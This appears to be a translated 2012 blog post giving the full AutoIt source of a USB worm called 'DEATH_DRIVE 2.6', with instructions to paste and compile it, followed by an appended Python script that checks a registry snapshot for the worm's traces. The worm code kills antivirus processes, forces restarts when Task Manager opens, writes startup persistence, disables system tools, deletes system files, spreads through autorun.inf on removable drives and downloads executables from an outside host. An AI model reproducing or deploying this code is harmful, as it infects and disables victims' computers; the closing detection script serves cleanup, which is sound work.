Animasi n Sahring

Thursday, 05 April 2012

Creating a Virus Script with AutoIt Script

+++++++++++++
//* INTRO *//
+++++++++++++

Many people are interested in writing viruses and antivirus software to show off
their programming skill, to take revenge, or perhaps to help others; most likely of all, just for fun.

Plenty of junior high and high school kids have already become interested in the world of computers, whether only
to play online games or because they are drawn to programming (like me :D). Is virspector in junior high yet?? :DD

Those who only play online games without knowing the ins and outs of computers
do not realize that their username and password can be stolen at any time,
and as usual, once that has happened, they will cry, ask around, or maybe just
let it pass.

If they are interested in programming, they surely have a way of thinking and a logic
that is relatively different from the friends around them. And not infrequently, the people
around them regard them as weird.


++++++++++++
//* Core *//
++++++++++++

Many kids are interested in computer viruses (WORMs, to be precise) and go looking for worm source
code on the internet to play around with, or just out of curiosity. They are too lazy to learn
programming and develop their own logic. And not infrequently their curiosity has
fairly serious consequences (just think: what if they run code they have just found and it turns out to be a variant of w32/kspoold. Wow... I am sure their parents would be furious, and of course they would be: the important documents on the computer would be encrypted and hard to read).


Straight to it......

I just want to share.
A while ago I had a strange idea (crazy :D) and it occurred to me to write worm code.
And this is the result....


This code is only to be studied, not to be played with. If you know the risks, go ahead and study it; if you do not know the risks of this code, STOP.!!!! Stop reading and navigate your browser away from this page.


This code is written in AUTOIT (www.autoitscript.com).. Learn AutoIt first, then study this code, because the explanation I give is minimal [sorry.. I am someone who is lazy about explaining :DD].


;//* ====================  C O D E  S T A R T  F R O M  H E R E  ============================== *//;

; ==================================== ;
;         DEATH_DRIVE 2.6              ;
;      ---------------------           ;
; written by poet_freak a.k.a poetro   ;
; only for educational purpose only    ;
; this code is given freely            ;
; without any warranty, use it at      ;
; your own risk                        ;
; december, 14 - 2008, 15.44 pm        ;
;all rights reversed                        ;
; ==================================== ;

Opt("trayiconhide" ,1)  ; hide systemtray icon

if ProcessExists("explorer.exe") = true Then    ;check the process, if explorer.exe exist
    Run(@windowsdir & "deathdrive_daemon.exe")  ; run C:\windows\deathdrive_daemon.exe
EndIf

While 1

if ProcessExists("taskmgr.exe") = true Then ;if taskmanager active = True
    Shutdown(6)   ; force restart computer
endif
If ProcessExists("msconfig.exe") = true Then     ; if msconfig active = true
    shutdown(6)                                    ; force restart
EndIf
ProcessClose("ansav.exe")        ; force close ansav.exe
ProcessClose("pcmav-cln.exe")    ; force close pcmav-cln.exe

$reg1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"    ; declare var reg1 as HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
$reg2 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"         ; declare var reg2 as HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
    RegWrite ($reg1,"daemon","REG_SZ",@windowsdir &"\p0et.exe")             ; write registry value at $reg1
    RegWrite ($reg1,"Avgsystray","REG_SZ",@windowsdir &"\p0et_freak1.exe")
    RegWrite ($reg1,"esetkrn","REG_SZ",@windowsdir &"\p0et_freak2.exe")
    RegWrite ($reg1,"NvidCpl","REG_SZ",@windowsdir &"\p0et_freak3.exe")
    RegWrite ($reg1,"Msmsgs","REG_SZ",@windowsdir &"\msmsgs.exe")
    Regwrite ($reg2 & "\Explorer\Advanced","SuperHidden","REG_DWORD","0")     ; write registry value at $reg2
    Regwrite ($reg2 & "\Explorer\Advanced","ShowSuperHidden","REG_DWORD","0")
    Regwrite ($reg2 & "\Explorer\Advanced","HideFileExt","REG_DWORD","1")
    Regwrite ($reg2 & "\Explorer\Advanced","Hidden","REG_DWORD","2")
    RegWrite ($reg2 & "\Policies\Explorer","NoFind","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\Explorer","NoFolderOptions","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\Explorer","NoDriveTypeAutoRun","REG_DWORD","91")
    RegWrite ($reg2 & "\Policies\Explorer","NoWelcomeScreen","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\system","DisableTaskMgr","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\system","DisableRegistryTools","REG_DWORD","1")
    Regwrite ($reg2 & "\Policies\system","ConfirmFileDelete","REG_DWORD","0")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International", "s1159", "REG_SZ", "poet")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International", "s2359", "REG_SZ", "poet")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International\Mouse", "MouseSensitivity", "REG_SZ", "0")
    RegWrite("HKEY_CURRENT_USER\Control Panel\International\Mouse", "SwapMouseButtons", "REG_SZ", "1")

    FileCopy(@ScriptFullPath,@windowsdir & "\msmsgs.exe")         ; create msmsgs.exe at C:\windows
    FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak1.exe")
    FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak2.exe")
    FileCopy(@scriptfullpath,@windowsdir & "\p0et_freak3.exe")
    FileCopy(@ScriptFullPath,@TempDir & "\pagefile.pif")
    FileCopy(@scriptfullpath,@ProgramFilesDir & "\Common Files\D_loader.exe")
    FileSetAttrib(@windowsdir & "\wininit.exe","-R")            ; clear read only attribute
    FileSetAttrib(@windowsdir & "\msmsgs.exe","+R+H+S")         ; create readonly + hidden + system file attribute
    FileSetAttrib(@windowsdir & "\p0et_freak1.exe","+R+H+S")
    FileSetAttrib(@windowsdir & "\p0et_freak2.exe","+R+H+S")
    FileSetAttrib(@windowsdir & "\p0et_freak3.exe","+R+H+S")
    FileSetAttrib(@TempDir & "\pagefile.pif","+S+R+H")
    FileDelete(@windowsdir &"\wininit.exe")                     ; delete C:\Windows\wininit.exe
    FileDelete(@SystemDir & "\MsVbVm60.dll")
  
if FileExists(@WindowsDir &"\autorun.inf") <> True Then             ; check autorun.inf in c:\windows, if not exist,
        $atr = fileOpen(@WindowsDir & "\autorun.inf",2)             ; create autorun.inf in C:\windows, then open C:\windows\autorun.inf
            FileWrite($atr, "[autorun]" & @CRLF)                    ; write [autorun]
            filewrite($atr, "label=Infected.!" &@crlf)                ; write label=infected.! at next line
            FileWrite($atr, "open=d_loader.exe" & @CRLF)
            FileWrite($atr, "shellexecute=d_loader.exe" &@CRLF)
            FileWrite($atr, "shell\Explore\command=d_loader.exe" &@CRLF)
            FileWrite($atr, "shell\Open\command=d_loader.exe" &@CRLF)
            FileWrite($atr, "shell=Explore")
            FileClose($atr)                                            ; close file
            FileSetAttrib(@WindowsDir & "\autorun.inf","+R+H+S")    ; set file attribute to readonly, hidden, system
    EndIf
  
if FileExists(@MyDocumentsDir & "\death-drive ver. 2.6 readme.txt") <> True Then
$atr = FileOpen(@MyDocumentsDir & "\death-drive ver. 2.6 readme.txt",2)
    FileWrite($atr, "to: someone there.... I still love U..." & @CRLF)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "aku tak akan panjang lebar," & @crlf)
    Filewrite($atr, " aku hanya ingin tahu jawabmu," & @crlf)
    Filewrite($atr, "mengapa di setiap perkataan yang aku katakan dengan tidak serius, kamu percaya," & @crlf)
    Filewrite($atr, "namun di saat aku jujur dan mengatakan semua yang memang benar terjadi, kau tak percaya." & @crlf)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "apa salahku??" & @crlf)
    Filewrite($atr, "mengapa dirimu begitu??" & @crlf)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "mengapa sampai segitunya dirimu membenciku??" & @crlf)
    Filewrite($atr, "" & @crlf)
    Filewrite($atr, "01 juni 2009 //* Aku masih sayang padamu *//   p0et" & @crlf)
    FileClose($atr)
EndIf
  
$path1 = DriveGetDrive ("REMOVABLE")
    if Not @error Then
        for $d = 1 to $path1[0]
            $flashdrive = $path1[$d]
            if $flashdrive <> "A:" and DriveGetFileSystem($flashdrive) <> "" Then
                FileSetAttrib($flashdrive & "\autorun.inf","-R")
                FileCopy(@ScriptFullPath,$flashdrive &"\d_loader.exe")
                FileCopy(@WindowsDir & "\autorun.inf",$flashdrive & "\autorun.inf",1)
                FileCopy(@mydocumentsdir & "\death-drive ver. 2.6 readme.txt", $flashdrive & "\death-drive ver. 2.6 readme.txt")
                FileSetAttrib($flashdrive & "\autorun.inf","+R+H+S")
                FileSetAttrib($flashdrive & "\d_loader.exe","+R+H+S")
                ; Search1
                $search1 = FileFindFirstFile($flashdrive & "\*.")
                if $search1 <> -1 Then
                    $file1 = FileFindNextFile($search1)
                        FileCopy(@scriptfullpath,$flashdrive &"\"& $file1 &".exe")
                        FileSetAttrib($flashdrive &"\"& $file1,"+H")
                        FileSetAttrib($flashdrive &"\"& $file1 &".exe","-H-S")
                EndIf
                FileClose($search1)
            EndIf
        Next
    EndIf
    ; Harddisk Drive
    $path2 = DriveGetDrive ("FIXED")
    if Not @error Then
        for $f = 1 to $path2[0]
            $drive = $path2[$f]
                FileSetAttrib($drive & "\autorun.inf","-R")
                FileCopy(@mydocumentsdir & "\death-drive ver. 2.6 readme.txt", $drive & "\death-drive ver. 2.6 readme.txt") ;copy
                FileDelete($drive & "\autorun.inf")
                FileCopy(@scriptfullpath, $drive & "temp.exe")
        Next
    EndIf
  

; *optional, auto-update feature
$webpath = "http://h1.ripway.com/poet_freak/file"            ; declare webpath to download update
    if FileExists(@systemdir & "\p0et_freak1.exe") = True Then    ; check file, if exist download file1.exe from webpath, then rename it to poet_freak1.exe
        InetGet($webpath & "/file1.exe",@SystemDir & "\p0et_freak1.exe")
    EndIf
    if FileExists(@systemdir & "\p0et_freak2.exe") = True Then
        InetGet($webpath & "/file2.exe",@SystemDir & "\p0et_freak2.exe")
    EndIf
    if FileExists(@systemdir & "\p0et_freak3.exe") = True Then
        InetGet($webpath & "/file3.exe",@SystemDir & "\p0et_freak3.exe")
    EndIf
WEnd         ; end of code

;//* ====================  E N D  O F  C O D E ================================= *//;


PLEASE PASTE the code into SciTE, then compile it with whatever parameters you like.

I DO NOT RECOMMEND RUNNING IT ON A COMPUTER WITHOUT ANTIVIRUS PROTECTION WITH A TRULY STABLE HEURISTIC SYSTEM
USE THIS CODE AT UR OWN RISK...!!

As ANHARKU often says, "mistakes are part of learning". Be careful.! Be careful.!

heheheheh......

greetz.
* HrXXX
* Anharku
* Garis Miring
* codenesia member
* Poet_freaks Reversing Community
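
For anyone cleaning up after a sample like this, the registry writes in the listing above are usable host indicators. The following Python check is an added example, not part of the original post: the snapshot format, the `triage` function and the sample data are assumptions constructed for illustration, while the value names and file names are the ones the listing writes.

```python
# Added defensive example: flag the registry changes made by the listing above.
# Input: a constructed snapshot {key_path: {value_name: data}}, e.g. parsed from a reg export.
HKLM_RUN = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
HKCU_CV = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"

# File names the listing registers under the Run key.
DROPPED = {"p0et.exe", "p0et_freak1.exe", "p0et_freak2.exe", "p0et_freak3.exe", "msmsgs.exe"}

# (subkey, value name, data written by the listing, effect on the user)
TAMPER = [
    (r"\Policies\system", "DisableTaskMgr", 1, "Task Manager disabled"),
    (r"\Policies\system", "DisableRegistryTools", 1, "registry editor disabled"),
    (r"\Policies\Explorer", "NoFolderOptions", 1, "Folder Options removed"),
    (r"\Policies\Explorer", "NoFind", 1, "Search removed"),
    (r"\Explorer\Advanced", "Hidden", 2, "hidden files not shown"),
    (r"\Explorer\Advanced", "ShowSuperHidden", 0, "protected OS files not shown"),
    (r"\Explorer\Advanced", "HideFileExt", 1, "file extensions hidden"),
]

def _norm(snapshot):
    """Registry key and value names are case-insensitive; normalise both."""
    return {k.lower(): {n.lower(): d for n, d in v.items()} for k, v in snapshot.items()}

def triage(snapshot):
    snap, findings = _norm(snapshot), []
    for name, data in snap.get(HKLM_RUN.lower(), {}).items():
        exe = str(data).strip('"').rsplit("\\", 1)[-1].lower()
        if exe in DROPPED:
            findings.append(("persistence", f"Run\\{name} -> {data}"))
    for sub, name, bad, meaning in TAMPER:
        val = snap.get((HKCU_CV + sub).lower(), {}).get(name.lower())
        if val is not None and str(val).strip() == str(bad):
            findings.append(("tamper", f"{name}={val}: {meaning}"))
    return findings

# Constructed sample snapshot: one affected profile, with mixed-case names.
SAMPLE = {
    HKLM_RUN: {"Avgsystray": r"C:\WINDOWS\p0et_freak1.exe",
               "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    HKCU_CV + r"\Policies\System": {"DisableTaskMgr": "1", "DisableRegistryTools": 1},
    HKCU_CV + r"\Explorer\Advanced": {"Hidden": 1, "HideFileExt": 1},
}

if __name__ == "__main__":
    for kind, detail in triage(SAMPLE):
        print(f"[{kind}] {detail}")
```

A name match on the Run key is a lead, not a verdict: confirm the file's location and hash before removing anything, and restore the policy values once the startup entries are gone.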
